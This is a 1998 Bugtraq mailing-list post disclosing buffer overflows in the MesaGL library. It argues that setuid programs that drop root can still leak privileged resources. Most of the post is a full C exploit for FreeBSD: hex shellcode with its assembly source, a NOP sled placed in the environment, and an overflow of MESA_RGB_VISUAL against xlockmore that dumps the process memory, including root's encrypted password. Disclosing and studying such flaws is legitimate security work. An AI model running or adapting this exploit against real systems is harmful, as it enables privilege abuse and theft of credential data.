|
Date: Tue, 24 Mar 1998 14:54:03 +0100 From: bjorn smedman <bs@ODEN.SE> To: BUGTRAQ@NETSPACE.ORG Subject: buffer overflow with a twist [The following text is in the "ISO-8859-1" character set] [Your display is set for the "US-ASCII" character set] [Some characters may be displayed incorrectly] Please excuse my ignorance and arrogance if this is known. MesaGL is a free OpenGL graphics library replacement for unix/X11, windows, beos, apple and others. There are many buffer overflows in this library, but fortunately (and naturally) it's rarely used in suid/sgid programs. The exception is xlookmore or if it is to use supported hardware accelerators (for 3d). Below is a FreeBSD program that will dump xlocks entire address space, including roots encrypted password, to stdout. For it to work, xlockmore must be built with MesaGL support. The result is fairly uninteresting, but the principle is IMHO not. Just because a program gives up root privileges nicely doesn't mean it's not exploitable. Code is suid for a reason, and usually the resources it used root privileges to get are still there after the setuid(getuid()). There must be alot of programs out there that gives up root fast, but still has some desirable privileges like open files, mmaped objects, io port access, interesting data, realtime scheduling or something. Has anybody looked into this? --------------------------------------------------------------------- /* * Standard buffer overflow exploit. Executes the machine code in "shell" * when given almost any FreeBSD executable using MesaGL's GLX as its * argument. * * Tested with MesaGL 2.6, FreeBSD 2.2.5 and alot of GLX programs. * * Example: ./a.out /usr/local/bin/xlock * * THIS PROGRAM IS PROVIDED FOR INFORMATIONAL PURPOSES ONLY. * ALSO, I DO NOT GARANTEE THIS PROGRAM TO WORK, OR NOT TO FRY * YOUR COMPUTER. * * By bs <bs@oden.se>, 1998 */ #include <stdlib.h> #include <string.h> #include <unistd.h> #include <err.h> /* The number of bytes after which we hit the return address ffb */ #define OLEN (104) /* * Gas asm for "shell". Doesn't execve (would be useless), but dumps the * entire address space of the process to stdout, page by page. * Write will not send us a SIGSEGV but set errno to "Bad address", * which we don't care about. We could probably be more picky about what * range to dump, but that would make it less generic, and my P166 does * this on xlockmore in 45 seconds. * * BUGS: * Makes stack grow * Self modifying * ";" is not a gas comment, but what is? * My asm experience equals zero * * By bs <bs@oden.se>, 1998 .data ; self modifying code :-( .align 1 .globl _main _main: jmp instr prepare: popl %ebx ; syscall's address xorl %eax,%eax movb %al,0x1(%ebx) ; change strcpy friendly movb %al,0x2(%ebx) ; 0xf to correct 0x0 movb %al,0x3(%ebx) movb %al,0x4(%ebx) movb %al,0x6(%ebx) xorl %ecx,%ecx ; our data pointer xorl %edx,%edx movw $0x0fff,%edx incl %edx ; step size 4096 (pagesize) jmp again ; go to work instr: call prepare syscall: .byte 0x9a,0xf,0xf,0xf,0xf,0x7,0xf ret again: xorl %eax,%eax incl %eax pushl %edx ; len (pagesize) pushl %ecx ; pointer pushl %eax ; 1 (stdout) addb $0x3,%eax ; 1+3 (0x4 = write) call syscall addb $0xc,%esp addl %edx,%ecx jz exit ; ecx wraped -> exit jmp again exit: xorl %eax,%eax pushl %eax ; 0 (exit status) incl %eax ; 1 (0x1 = exit) call syscall .byte 0x0 ; strcpy&co stops here * * */ unsigned char shell[] = { 0xeb, 0x1d, 0x5b, 0x31, 0xc0, 0x88, 0x43, 0x1, 0x88, 0x43, 0x2, 0x88, 0x43, 0x3, 0x88, 0x43, 0x4, 0x88, 0x43, 0x6, 0x31, 0xc9, 0x31, 0xd2, 0x66, 0xba, 0xff, 0xf, 0x42, 0xeb, 0xd, 0xe8, 0xde, 0xff, 0xff, 0xff, 0x9a, 0xf, 0xf, 0xf, 0xf, 0x7, 0xf, 0xc3, 0x31, 0xc0, 0x40, 0x52, 0x51, 0x50, 0x83, 0xc0, 0x3, 0xe8, 0xea, 0xff, 0xff, 0xff, 0x83, 0xc4, 0xc, 0x1, 0xd1, 0x74, 0x2, 0xeb, 0xe9, 0x31, 0xc0, 0x50, 0x40, 0xe8, 0xd8, 0xff, 0xff, 0xff, 0x0 }; /* Stolen from somebody. Is this better than a constant? Why? */ char *get_esp(void) { asm("movl %esp,%eax"); } int main(int argc, char **argv) { char *nargv[10]; char mesa_rgb_visual[512]; char nopandshell[8096]; nargv[0] = (argc > 1 ? argv[1] : "./a.out"); nargv[1] = NULL; memset(mesa_rgb_visual, 'a', sizeof(mesa_rgb_visual)); *((void **)&mesa_rgb_visual[OLEN]) = (void *)(get_esp() + 4096); strcpy(&mesa_rgb_visual[OLEN+4], " 16"); setenv("MESA_RGB_VISUAL", mesa_rgb_visual, 1); memset(nopandshell, 0x90, sizeof(nopandshell)); memcpy(nopandshell+sizeof(nopandshell)-sizeof(shell), shell, sizeof(shell)); setenv("SHELLCODE", nopandshell, 1); execv(nargv[0], nargv); err(1, "execve"); } --- Björn Smedman